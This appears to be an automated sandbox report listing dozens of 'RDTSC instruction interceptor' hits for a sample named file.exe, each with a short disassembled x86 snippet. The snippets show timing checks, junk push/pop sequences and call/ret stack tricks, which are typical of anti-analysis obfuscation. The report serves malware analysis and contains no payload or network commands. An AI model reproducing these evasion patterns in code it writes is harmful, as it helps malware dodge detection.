Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 366896 second address: 3668B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2749204C39h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3668B3 second address: 3668B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3676F0 second address: 367701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3686EA second address: 3686EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3678A5 second address: 3678D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F2749204C37h 0x00000012 jmp 00007F2749204C31h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3678D0 second address: 3678DA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F27492B520Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36A848 second address: 36A851 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36A95D second address: 36A96E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F27492B5208h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D841 second address: 36D84B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F2749204C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D84B second address: 36D894 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F27492B5208h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 mov di, si 0x00000026 push 00000000h 0x00000028 mov dword ptr [ebp+12460362h], edx 0x0000002e push 00000000h 0x00000030 mov edi, dword ptr [ebp+122D2D7Fh] 0x00000036 push eax 0x00000037 jng 00007F27492B5210h 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36F53E second address: 36F542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36F542 second address: 36F54B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36F54B second address: 36F5B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F2749204C28h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 cmc 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ebx 0x0000002b call 00007F2749204C28h 0x00000030 pop ebx 0x00000031 mov dword ptr [esp+04h], ebx 0x00000035 add dword ptr [esp+04h], 0000001Dh 0x0000003d inc ebx 0x0000003e push ebx 0x0000003f ret 0x00000040 pop ebx 0x00000041 ret 0x00000042 sub ebx, dword ptr [ebp+1247A71Ah] 0x00000048 pushad 0x00000049 mov dword ptr [ebp+122D192Ah], edx 0x0000004f mov bh, cl 0x00000051 popad 0x00000052 push eax 0x00000053 push esi 0x00000054 push eax 0x00000055 push edx 0x00000056 push edi 0x00000057 pop edi 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36DAA1 second address: 36DAAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F27492B520Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36E863 second address: 36E867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 371C67 second address: 371C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36E867 second address: 36E86D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 373AD7 second address: 373B3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F27492B520Eh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 mov ebx, dword ptr [ebp+122D3837h] 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+1247A563h], ecx 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007F27492B5208h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000015h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b mov dword ptr [ebp+1248B7BDh], ebx 0x00000041 jnc 00007F27492B520Ch 0x00000047 xchg eax, esi 0x00000048 pushad 0x00000049 pushad 0x0000004a pushad 0x0000004b popad 0x0000004c pushad 0x0000004d popad 0x0000004e popad 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36E86D second address: 36E884 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007F2749204C26h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F2749204C26h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 371D24 second address: 371D2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F27492B5206h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 371D2E second address: 371D40 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2749204C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36E884 second address: 36E88A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 371D40 second address: 371D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36E88A second address: 36E88F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 374A4D second address: 374A52 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 374A52 second address: 374AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F27492B5208h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007F27492B5208h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 pushad 0x00000041 sbb bx, DBA5h 0x00000046 mov dword ptr [ebp+1248B6DDh], edi 0x0000004c popad 0x0000004d push 00000000h 0x0000004f je 00007F27492B520Bh 0x00000055 add di, 4700h 0x0000005a xchg eax, esi 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F27492B520Fh 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 374AD0 second address: 374AD6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36C983 second address: 36C990 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36C990 second address: 36C9B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2749204C34h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36C9B5 second address: 36C9B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36CA8A second address: 36CAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jne 00007F2749204C26h 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2749204C2Bh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36CAA6 second address: 36CAAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 373CD2 second address: 373CD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 376AE2 second address: 376AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 314609 second address: 31460D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31460D second address: 314635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F27492B5218h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F27492B5206h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 314635 second address: 314645 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F2749204C2Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 314645 second address: 31464F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31464F second address: 314653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 314653 second address: 314657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 374CDB second address: 374CE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37E6A7 second address: 37E6AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37E6AB second address: 37E6B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37E6B7 second address: 37E6BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37E1F7 second address: 37E21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2749204C2Eh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F2749204C2Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37E21A second address: 37E238 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F27492B5206h 0x00000008 jmp 00007F27492B5214h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 381649 second address: 381658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 381658 second address: 381686 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jng 00007F27492B5217h 0x00000010 jg 00007F27492B5211h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jc 00007F27492B5206h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 381727 second address: 38172C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38172C second address: 381736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F27492B5206h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 381736 second address: 38173A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 388BDE second address: 388BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F27492B520Eh 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 389516 second address: 38951A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38951A second address: 38951E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38951E second address: 389536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2749204C32h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 389536 second address: 389543 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 je 00007F27492B5206h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 389543 second address: 38954C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38954C second address: 389552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 389552 second address: 389556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 389556 second address: 38955A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 389959 second address: 38998C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F2749204C32h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F2749204C32h 0x00000011 pushad 0x00000012 jnl 00007F2749204C26h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 389AFA second address: 389B26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B5216h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e je 00007F27492B5206h 0x00000014 jnc 00007F27492B5206h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 389B26 second address: 389B37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2749204C2Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 389B37 second address: 389B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 389B3B second address: 389B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2749204C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F2749204C26h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 389CB1 second address: 389CD6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F27492B520Ch 0x00000008 jl 00007F27492B521Bh 0x0000000e jmp 00007F27492B520Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38E1FC second address: 38E200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38E200 second address: 38E210 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F27492B520Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38E210 second address: 38E222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F2749204C32h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38E33C second address: 38E340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38E340 second address: 38E358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2749204C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F2749204C26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38E358 second address: 38E35C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38E8D2 second address: 38E8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007F2749204C36h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38E8EF second address: 38E942 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F27492B5215h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jns 00007F27492B5206h 0x00000016 jmp 00007F27492B520Fh 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push edx 0x0000001f jmp 00007F27492B5217h 0x00000024 pushad 0x00000025 popad 0x00000026 pop edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38F4EB second address: 38F4F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38F4F3 second address: 38F4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38F4F8 second address: 38F51C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2749204C3Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38DEFE second address: 38DF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38DF03 second address: 38DF1C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2749204C33h 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38DF1C second address: 38DF20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 396FA4 second address: 396FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2749204C2Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30A4AB second address: 30A4B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30A4B0 second address: 30A4E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007F2749204C26h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F2749204C2Ch 0x00000013 jmp 00007F2749204C37h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 395EFB second address: 395EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 395EFF second address: 395F04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361413 second address: 361494 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F27492B5208h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 add cl, FFFFFF88h 0x00000026 lea eax, dword ptr [ebp+12498167h] 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F27492B5208h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 mov dword ptr [ebp+122D2C5Bh], edi 0x0000004c nop 0x0000004d push ecx 0x0000004e jmp 00007F27492B5217h 0x00000053 pop ecx 0x00000054 push eax 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361494 second address: 3614A2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2749204C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3614A2 second address: 33FD98 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 movsx edx, si 0x0000000b mov edx, ebx 0x0000000d call dword ptr [ebp+12468703h] 0x00000013 pushad 0x00000014 jmp 00007F27492B5213h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
